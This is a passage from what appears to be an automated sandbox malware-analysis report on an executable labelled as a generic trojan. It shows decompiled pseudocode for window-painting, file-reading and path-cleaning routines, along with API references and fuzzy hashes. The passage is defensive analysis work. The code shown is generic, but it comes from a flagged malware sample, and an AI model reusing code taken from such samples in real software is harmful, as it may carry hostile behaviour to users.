                                                                                                                            • Part of subcall function 00406158: GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.61167322.14727.exe,80000000,00000003), ref: 0040615C
                                                                                                                            • Part of subcall function 00406158: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33051309738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.33051278337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051370538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051404339.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051528806.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051549373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051594740.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051637884.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                                          • String ID: %ls=%ls$[Rename]$mB$uB$uB
                                                                                                                          • API String ID: 2171350718-2295842750
                                                                                                                          • Opcode ID: 07ea5d3dd502240bf86d0c298f94c43ad2335bec49c481c59c36197298e6ebad
                                                                                                                          • Instruction ID: df9b4e9fb9d32bd4c250032a1d399944af7a2e4c2f0bdec2b7d3959d12e60cc8
                                                                                                                          • Opcode Fuzzy Hash: 07ea5d3dd502240bf86d0c298f94c43ad2335bec49c481c59c36197298e6ebad
                                                                                                                          • Instruction Fuzzy Hash: B8314331200315BBD2206B619D49F5B3AACEF85704F16003BFD02FA2C2EA7DD82186BD
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 90%
                                                                                                                          			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
                                                                                                                          				struct tagLOGBRUSH _v16;
                                                                                                                          				struct tagRECT _v32;
                                                                                                                          				struct tagPAINTSTRUCT _v96;
                                                                                                                          				struct HDC__* _t70;
                                                                                                                          				struct HBRUSH__* _t87;
                                                                                                                          				struct HFONT__* _t94;
                                                                                                                          				long _t102;
                                                                                                                          				signed int _t126;
                                                                                                                          				struct HDC__* _t128;
                                                                                                                          				intOrPtr _t130;
                                                                                                                          
                                                                                                                          				if(_a8 == 0xf) {
                                                                                                                          					_t130 =  *0x42a270;
                                                                                                                          					_t70 = BeginPaint(_a4,  &_v96);
                                                                                                                          					_v16.lbStyle = _v16.lbStyle & 0x00000000;
                                                                                                                          					_a8 = _t70;
                                                                                                                          					GetClientRect(_a4,  &_v32);
                                                                                                                          					_t126 = _v32.bottom;
                                                                                                                          					_v32.bottom = _v32.bottom & 0x00000000;
                                                                                                                          					while(_v32.top < _t126) {
                                                                                                                          						_a12 = _t126 - _v32.top;
                                                                                                                          						asm("cdq");
                                                                                                                          						asm("cdq");
                                                                                                                          						asm("cdq");
                                                                                                                          						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
                                                                                                                          						_t87 = CreateBrushIndirect( &_v16);
                                                                                                                          						_v32.bottom = _v32.bottom + 4;
                                                                                                                          						_a16 = _t87;
                                                                                                                          						FillRect(_a8,  &_v32, _t87);
                                                                                                                          						DeleteObject(_a16);
                                                                                                                          						_v32.top = _v32.top + 4;
                                                                                                                          					}
                                                                                                                          					if( *(_t130 + 0x58) != 0xffffffff) {
                                                                                                                          						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
                                                                                                                          						_a16 = _t94;
                                                                                                                          						if(_t94 != 0) {
                                                                                                                          							_t128 = _a8;
                                                                                                                          							_v32.left = 0x10;
                                                                                                                          							_v32.top = 8;
                                                                                                                          							SetBkMode(_t128, 1);
                                                                                                                          							SetTextColor(_t128,  *(_t130 + 0x58));
                                                                                                                          							_a8 = SelectObject(_t128, _a16);
                                                                                                                          							DrawTextW(_t128, 0x429260, 0xffffffff,  &_v32, 0x820);
                                                                                                                          							SelectObject(_t128, _a8);
                                                                                                                          							DeleteObject(_a16);
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          					EndPaint(_a4,  &_v96);
                                                                                                                          					return 0;
                                                                                                                          				}
                                                                                                                          				_t102 = _a16;
                                                                                                                          				if(_a8 == 0x46) {
                                                                                                                          					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
                                                                                                                          					 *((intOrPtr*)(_t102 + 4)) =  *0x42a268;
                                                                                                                          				}
                                                                                                                          				return DefWindowProcW(_a4, _a8, _a12, _t102);
                                                                                                                          			}













                                                                                                                          0x0040100a
                                                                                                                          0x00401039
                                                                                                                          0x00401047
                                                                                                                          0x0040104d
                                                                                                                          0x00401051
                                                                                                                          0x0040105b
                                                                                                                          0x00401061
                                                                                                                          0x00401064
                                                                                                                          0x004010f3
                                                                                                                          0x00401089
                                                                                                                          0x0040108c
                                                                                                                          0x004010a6
                                                                                                                          0x004010bd
                                                                                                                          0x004010cc
                                                                                                                          0x004010cf
                                                                                                                          0x004010d5
                                                                                                                          0x004010d9
                                                                                                                          0x004010e4
                                                                                                                          0x004010ed
                                                                                                                          0x004010ef
                                                                                                                          0x004010ef
                                                                                                                          0x00401100
                                                                                                                          0x00401105
                                                                                                                          0x0040110d
                                                                                                                          0x00401110
                                                                                                                          0x00401112
                                                                                                                          0x00401118
                                                                                                                          0x0040111f
                                                                                                                          0x00401126
                                                                                                                          0x00401130
                                                                                                                          0x00401142
                                                                                                                          0x00401156
                                                                                                                          0x00401160
                                                                                                                          0x00401165
                                                                                                                          0x00401165
                                                                                                                          0x00401110
                                                                                                                          0x0040116e
                                                                                                                          0x00000000
                                                                                                                          0x00401178
                                                                                                                          0x00401010
                                                                                                                          0x00401013
                                                                                                                          0x00401015
                                                                                                                          0x0040101f
                                                                                                                          0x0040101f
                                                                                                                          0x00000000

                                                                                                                          APIs
                                                                                                                          • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                          • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                          • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                          • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                          • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                          • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                          • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                          • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                          • DrawTextW.USER32(00000000,00429260,000000FF,00000010,00000820), ref: 00401156
                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                          • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                          • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33051309738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.33051278337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051370538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051404339.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051528806.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051549373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051594740.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051637884.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                          • String ID: F
                                                                                                                          • API String ID: 941294808-1304234792
                                                                                                                          • Opcode ID: 8da9fae8b34351ceae2931000ebd9f39a308799c7d87b7a6dbcfe72b45b7384c
                                                                                                                          • Instruction ID: e2f9fea5dfd6f059ba8eeb08e8d10ac227d01a2162b8a260283931f50cd0bfbf
                                                                                                                          • Opcode Fuzzy Hash: 8da9fae8b34351ceae2931000ebd9f39a308799c7d87b7a6dbcfe72b45b7384c
                                                                                                                          • Instruction Fuzzy Hash: 33418B71800209EFCF058FA5DE459AF7BB9FF45315F00802AF991AA2A0C7349A55DFA4
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E0040462B(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                                                                                                                          				struct tagLOGBRUSH _v16;
                                                                                                                          				long _t39;
                                                                                                                          				long _t41;
                                                                                                                          				void* _t44;
                                                                                                                          				signed char _t50;
                                                                                                                          				long* _t54;
                                                                                                                          
                                                                                                                          				if(_a4 + 0xfffffecd > 5) {
                                                                                                                          					L18:
                                                                                                                          					return 0;
                                                                                                                          				}
                                                                                                                          				_t54 = GetWindowLongW(_a12, 0xffffffeb);
                                                                                                                          				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
                                                                                                                          					goto L18;
                                                                                                                          				} else {
                                                                                                                          					_t50 = _t54[5];
                                                                                                                          					if((_t50 & 0xffffffe0) != 0) {
                                                                                                                          						goto L18;
                                                                                                                          					}
                                                                                                                          					_t39 =  *_t54;
                                                                                                                          					if((_t50 & 0x00000002) != 0) {
                                                                                                                          						_t39 = GetSysColor(_t39);
                                                                                                                          					}
                                                                                                                          					if((_t54[5] & 0x00000001) != 0) {
                                                                                                                          						SetTextColor(_a8, _t39);
                                                                                                                          					}
                                                                                                                          					SetBkMode(_a8, _t54[4]);
                                                                                                                          					_t41 = _t54[1];
                                                                                                                          					_v16.lbColor = _t41;
                                                                                                                          					if((_t54[5] & 0x00000008) != 0) {
                                                                                                                          						_t41 = GetSysColor(_t41);
                                                                                                                          						_v16.lbColor = _t41;
                                                                                                                          					}
                                                                                                                          					if((_t54[5] & 0x00000004) != 0) {
                                                                                                                          						SetBkColor(_a8, _t41);
                                                                                                                          					}
                                                                                                                          					if((_t54[5] & 0x00000010) != 0) {
                                                                                                                          						_v16.lbStyle = _t54[2];
                                                                                                                          						_t44 = _t54[3];
                                                                                                                          						if(_t44 != 0) {
                                                                                                                          							DeleteObject(_t44);
                                                                                                                          						}
                                                                                                                          						_t54[3] = CreateBrushIndirect( &_v16);
                                                                                                                          					}
                                                                                                                          					return _t54[3];
                                                                                                                          				}
                                                                                                                          			}









                                                                                                                          0x0040463d
                                                                                                                          0x004046f3
                                                                                                                          0x00000000
                                                                                                                          0x004046f3
                                                                                                                          0x0040464e
                                                                                                                          0x00404652
                                                                                                                          0x00000000
                                                                                                                          0x0040466c
                                                                                                                          0x0040466c
                                                                                                                          0x00404675
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00404677
                                                                                                                          0x00404683
                                                                                                                          0x00404686
                                                                                                                          0x00404686
                                                                                                                          0x0040468c
                                                                                                                          0x00404692
                                                                                                                          0x00404692
                                                                                                                          0x0040469e
                                                                                                                          0x004046a4
                                                                                                                          0x004046ab
                                                                                                                          0x004046ae
                                                                                                                          0x004046b1
                                                                                                                          0x004046b3
                                                                                                                          0x004046b3
                                                                                                                          0x004046bb
                                                                                                                          0x004046c1
                                                                                                                          0x004046c1
                                                                                                                          0x004046cb
                                                                                                                          0x004046d0
                                                                                                                          0x004046d3
                                                                                                                          0x004046d8
                                                                                                                          0x004046db
                                                                                                                          0x004046db
                                                                                                                          0x004046eb
                                                                                                                          0x004046eb
                                                                                                                          0x00000000
                                                                                                                          0x004046ee

                                                                                                                          APIs
                                                                                                                          • GetWindowLongW.USER32(?,000000EB), ref: 00404648
                                                                                                                          • GetSysColor.USER32(00000000), ref: 00404686
                                                                                                                          • SetTextColor.GDI32(?,00000000), ref: 00404692
                                                                                                                          • SetBkMode.GDI32(?,?), ref: 0040469E
                                                                                                                          • GetSysColor.USER32(?), ref: 004046B1
                                                                                                                          • SetBkColor.GDI32(?,?), ref: 004046C1
                                                                                                                          • DeleteObject.GDI32(?), ref: 004046DB
                                                                                                                          • CreateBrushIndirect.GDI32(?), ref: 004046E5
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33051309738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.33051278337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051370538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051404339.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051528806.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051549373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051594740.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051637884.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2320649405-0
                                                                                                                          • Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                                                                                          • Instruction ID: e78b8cc9c8042372c9a7340b9b8aa9b23ded286a9f8ddc7240a2e2d8bd1f46c0
                                                                                                                          • Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                                                                                          • Instruction Fuzzy Hash: DE2197715007049FC7309F28D908B5BBBF8AF42714F008D2EE992A22E1D739D944DB58
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 87%
                                                                                                                          			E004026EC(intOrPtr __ebx, intOrPtr __edx, void* __edi) {
                                                                                                                          				intOrPtr _t65;
                                                                                                                          				intOrPtr _t66;
                                                                                                                          				intOrPtr _t72;
                                                                                                                          				void* _t76;
                                                                                                                          				void* _t79;
                                                                                                                          
                                                                                                                          				_t72 = __edx;
                                                                                                                          				 *((intOrPtr*)(_t76 - 8)) = __ebx;
                                                                                                                          				_t65 = 2;
                                                                                                                          				 *((intOrPtr*)(_t76 - 0x4c)) = _t65;
                                                                                                                          				_t66 = E00402D84(_t65);
                                                                                                                          				_t79 = _t66 - 1;
                                                                                                                          				 *((intOrPtr*)(_t76 - 0x10)) = _t72;
                                                                                                                          				 *((intOrPtr*)(_t76 - 0x44)) = _t66;
                                                                                                                          				if(_t79 < 0) {
                                                                                                                          					L36:
                                                                                                                          					 *0x42a2e8 =  *0x42a2e8 +  *(_t76 - 4);
                                                                                                                          				} else {
                                                                                                                          					__ecx = 0x3ff;
                                                                                                                          					if(__eax > 0x3ff) {
                                                                                                                          						 *(__ebp - 0x44) = 0x3ff;
                                                                                                                          					}
                                                                                                                          					if( *__edi == __bx) {
                                                                                                                          						L34:
                                                                                                                          						__ecx =  *(__ebp - 0xc);
                                                                                                                          						__eax =  *(__ebp - 8);
                                                                                                                          						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
                                                                                                                          						if(_t79 == 0) {
                                                                                                                          							 *(_t76 - 4) = 1;
                                                                                                                          						}
                                                                                                                          						goto L36;
                                                                                                                          					} else {
                                                                                                                          						 *(__ebp - 0x38) = __ebx;
                                                                                                                          						 *(__ebp - 0x18) = E004065C8(__ecx, __edi);
                                                                                                                          						if( *(__ebp - 0x44) > __ebx) {
                                                                                                                          							do {
                                                                                                                          								if( *((intOrPtr*)(__ebp - 0x34)) != 0x39) {
                                                                                                                          									if( *((intOrPtr*)(__ebp - 0x24)) != __ebx ||  *(__ebp - 8) != __ebx || E00406239( *(__ebp - 0x18), __ebx) >= 0) {
                                                                                                                          										__eax = __ebp - 0x50;
                                                                                                                          										if(E004061DB( *(__ebp - 0x18), __ebp - 0x50, 2) == 0) {
                                                                                                                          											goto L34;
                                                                                                                          										} else {
                                                                                                                          											goto L21;
                                                                                                                          										}
                                                                                                                          									} else {
                                                                                                                          										goto L34;
                                                                                                                          									}
                                                                                                                          								} else {
                                                                                                                          									__eax = __ebp - 0x40;
                                                                                                                          									_push(__ebx);
                                                                                                                          									_push(__ebp - 0x40);
                                                                                                                          									__eax = 2;
                                                                                                                          									__ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)) = __ebp + 0xa;
                                                                                                                          									__eax = ReadFile( *(__ebp - 0x18), __ebp + 0xa, __ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)), ??, ??);
                                                                                                                          									if(__eax == 0) {
                                                                                                                          										goto L34;
                                                                                                                          									} else {
                                                                                                                          										__ecx =  *(__ebp - 0x40);
                                                                                                                          										if(__ecx == __ebx) {
                                                                                                                          											goto L34;
                                                                                                                          										} else {
                                                                                                                          											__ax =  *(__ebp + 0xa) & 0x000000ff;
                                                                                                                          											 *(__ebp - 0x4c) = __ecx;
                                                                                                                          											 *(__ebp - 0x50) = __eax;
                                                                                                                          											if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
                                                                                                                          												L28:
                                                                                                                          												__ax & 0x0000ffff = E004065AF( *(__ebp - 0xc), __ax & 0x0000ffff);
                                                                                                                          											} else {
                                                                                                                          												__ebp - 0x50 = __ebp + 0xa;
                                                                                                                          												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x50, 1) != 0) {
                                                                                                                          													L21:
                                                                                                                          													__eax =  *(__ebp - 0x50);
                                                                                                                          												} else {
                                                                                                                          													__edi =  *(__ebp - 0x4c);
                                                                                                                          													__edi =  ~( *(__ebp - 0x4c));
                                                                                                                          													while(1) {
                                                                                                                          														_t22 = __ebp - 0x40;
                                                                                                                          														 *_t22 =  *(__ebp - 0x40) - 1;
                                                                                                                          														__eax = 0xfffd;
                                                                                                                          														 *(__ebp - 0x50) = 0xfffd;
                                                                                                                          														if( *_t22 == 0) {
                                                                                                                          															goto L22;
                                                                                                                          														}
                                                                                                                          														 *(__ebp - 0x4c) =  *(__ebp - 0x4c) - 1;
                                                                                                                          														__edi = __edi + 1;
                                                                                                                          														SetFilePointer( *(__ebp - 0x18), __edi, __ebx, 1) = __ebp - 0x50;
                                                                                                                          														__eax = __ebp + 0xa;
                                                                                                                          														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x40), __ebp - 0x50, 1) == 0) {
                                                                                                                          															continue;
                                                                                                                          														} else {
                                                                                                                          															goto L21;
                                                                                                                          														}
                                                                                                                          														goto L22;
                                                                                                                          													}
                                                                                                                          												}
                                                                                                                          												L22:
                                                                                                                          												if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
                                                                                                                          													goto L28;
                                                                                                                          												} else {
                                                                                                                          													if( *(__ebp - 0x38) == 0xd ||  *(__ebp - 0x38) == 0xa) {
                                                                                                                          														if( *(__ebp - 0x38) == __ax || __ax != 0xd && __ax != 0xa) {
                                                                                                                          															 *(__ebp - 0x4c) =  ~( *(__ebp - 0x4c));
                                                                                                                          															__eax = SetFilePointer( *(__ebp - 0x18),  ~( *(__ebp - 0x4c)), __ebx, 1);
                                                                                                                          														} else {
                                                                                                                          															__ecx =  *(__ebp - 0xc);
                                                                                                                          															__edx =  *(__ebp - 8);
                                                                                                                          															 *(__ebp - 8) =  *(__ebp - 8) + 1;
                                                                                                                          															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
                                                                                                                          														}
                                                                                                                          														goto L34;
                                                                                                                          													} else {
                                                                                                                          														__ecx =  *(__ebp - 0xc);
                                                                                                                          														__edx =  *(__ebp - 8);
                                                                                                                          														 *(__ebp - 8) =  *(__ebp - 8) + 1;
                                                                                                                          														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
                                                                                                                          														 *(__ebp - 0x38) = __eax;
                                                                                                                          														if(__ax == __bx) {
                                                                                                                          															goto L34;
                                                                                                                          														} else {
                                                                                                                          															goto L26;
                                                                                                                          														}
                                                                                                                          													}
                                                                                                                          												}
                                                                                                                          											}
                                                                                                                          										}
                                                                                                                          									}
                                                                                                                          								}
                                                                                                                          								goto L37;
                                                                                                                          								L26:
                                                                                                                          								__eax =  *(__ebp - 8);
                                                                                                                          							} while ( *(__ebp - 8) <  *(__ebp - 0x44));
                                                                                                                          						}
                                                                                                                          						goto L34;
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				L37:
                                                                                                                          				return 0;
                                                                                                                          			}








                                                                                                                          0x004026ec
                                                                                                                          0x004026ee
                                                                                                                          0x004026f1
                                                                                                                          0x004026f3
                                                                                                                          0x004026f6
                                                                                                                          0x004026fb
                                                                                                                          0x004026ff
                                                                                                                          0x00402702
                                                                                                                          0x00402705
                                                                                                                          0x00402c2a
                                                                                                                          0x00402c2d
                                                                                                                          0x0040270b
                                                                                                                          0x0040270b
                                                                                                                          0x00402712
                                                                                                                          0x00402714
                                                                                                                          0x00402714
                                                                                                                          0x0040271a
                                                                                                                          0x0040287e
                                                                                                                          0x0040287e
                                                                                                                          0x00402881
                                                                                                                          0x00402886
                                                                                                                          0x004015b6
                                                                                                                          0x0040292e
                                                                                                                          0x0040292e
                                                                                                                          0x00000000
                                                                                                                          0x00402720
                                                                                                                          0x00402721
                                                                                                                          0x0040272c
                                                                                                                          0x0040272f
                                                                                                                          0x0040273b
                                                                                                                          0x0040273f
                                                                                                                          0x004027d7
                                                                                                                          0x004027ef
                                                                                                                          0x004027ff
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00402745
                                                                                                                          0x00402745
                                                                                                                          0x00402748
                                                                                                                          0x00402749
                                                                                                                          0x0040274c
                                                                                                                          0x00402751
                                                                                                                          0x00402758
                                                                                                                          0x00402760
                                                                                                                          0x00000000
                                                                                                                          0x00402766
                                                                                                                          0x00402766
                                                                                                                          0x0040276b
                                                                                                                          0x00000000
                                                                                                                          0x00402771
                                                                                                                          0x00402771
                                                                                                                          0x00402779
                                                                                                                          0x0040277c
                                                                                                                          0x0040277f
                                                                                                                          0x0040283a
                                                                                                                          0x00402841
                                                                                                                          0x00402785
                                                                                                                          0x0040278b
                                                                                                                          0x00402797
                                                                                                                          0x00402801
                                                                                                                          0x00402801
                                                                                                                          0x00402799
                                                                                                                          0x00402799
                                                                                                                          0x0040279c
                                                                                                                          0x0040279e
                                                                                                                          0x0040279e
                                                                                                                          0x0040279e
                                                                                                                          0x004027a1
                                                                                                                          0x004027a6
                                                                                                                          0x004027a9
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004027ab
                                                                                                                          0x004027ae
                                                                                                                          0x004027bc
                                                                                                                          0x004027c2
                                                                                                                          0x004027d0
                                                                                                                          0x00000000
                                                                                                                          0x004027d2
                                                                                                                          0x00000000
                                                                                                                          0x004027d2
                                                                                                                          0x00000000
                                                                                                                          0x004027d0
                                                                                                                          0x0040279e
                                                                                                                          0x00402804
                                                                                                                          0x00402807
                                                                                                                          0x00000000
                                                                                                                          0x00402809
                                                                                                                          0x0040280e
                                                                                                                          0x0040284f
                                                                                                                          0x00402871
                                                                                                                          0x00402878
                                                                                                                          0x0040285d
                                                                                                                          0x0040285d
                                                                                                                          0x00402860
                                                                                                                          0x00402863
                                                                                                                          0x00402866
                                                                                                                          0x00402866
                                                                                                                          0x00000000
                                                                                                                          0x00402817
                                                                                                                          0x00402817
                                                                                                                          0x0040281a
                                                                                                                          0x0040281d
                                                                                                                          0x00402823
                                                                                                                          0x00402827
                                                                                                                          0x0040282a
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040282a
                                                                                                                          0x0040280e
                                                                                                                          0x00402807
                                                                                                                          0x0040277f
                                                                                                                          0x0040276b
                                                                                                                          0x00402760
                                                                                                                          0x00000000
                                                                                                                          0x0040282c
                                                                                                                          0x0040282c
                                                                                                                          0x0040282f
                                                                                                                          0x00402838
                                                                                                                          0x00000000
                                                                                                                          0x0040272f
                                                                                                                          0x0040271a
                                                                                                                          0x00402c33
                                                                                                                          0x00402c39

                                                                                                                          APIs
                                                                                                                          • ReadFile.KERNEL32(?,?,?,?), ref: 00402758
                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
                                                                                                                          • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC
                                                                                                                            • Part of subcall function 00406239: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 0040624F
                                                                                                                          • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33051309738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.33051278337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051370538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051404339.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051528806.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051549373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051594740.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051637884.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                                          • String ID: 9
                                                                                                                          • API String ID: 163830602-2366072709
                                                                                                                          • Opcode ID: c494a9c5f1831dca55446a6dfc25bb45b63b896379fbbdb0ec38153142a3ac1c
                                                                                                                          • Instruction ID: 581cf2785626502de532f206a1de9da9d9b8d20bcd24121b7f7bd1133decb9a2
                                                                                                                          • Opcode Fuzzy Hash: c494a9c5f1831dca55446a6dfc25bb45b63b896379fbbdb0ec38153142a3ac1c
                                                                                                                          • Instruction Fuzzy Hash: CE51FB75D00219AADF20EF95CA88AAEBB75FF04304F50417BE541B62D4D7B49D82CB58
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 91%
                                                                                                                          			E004068EF(WCHAR* _a4) {
                                                                                                                          				short _t5;
                                                                                                                          				short _t7;
                                                                                                                          				WCHAR* _t19;
                                                                                                                          				WCHAR* _t20;
                                                                                                                          				WCHAR* _t21;
                                                                                                                          
                                                                                                                          				_t20 = _a4;
                                                                                                                          				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
                                                                                                                          					_t20 =  &(_t20[4]);
                                                                                                                          				}
                                                                                                                          				if( *_t20 != 0 && E00405FAE(_t20) != 0) {
                                                                                                                          					_t20 =  &(_t20[2]);
                                                                                                                          				}
                                                                                                                          				_t5 =  *_t20;
                                                                                                                          				_t21 = _t20;
                                                                                                                          				_t19 = _t20;
                                                                                                                          				if(_t5 != 0) {
                                                                                                                          					do {
                                                                                                                          						if(_t5 > 0x1f &&  *((short*)(E00405F64(L"*?|<>/\":", _t5))) == 0) {
                                                                                                                          							E00406113(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
                                                                                                                          							_t19 = CharNextW(_t19);
                                                                                                                          						}
                                                                                                                          						_t20 = CharNextW(_t20);
                                                                                                                          						_t5 =  *_t20;
                                                                                                                          					} while (_t5 != 0);
                                                                                                                          				}
                                                                                                                          				 *_t19 =  *_t19 & 0x00000000;
                                                                                                                          				while(1) {
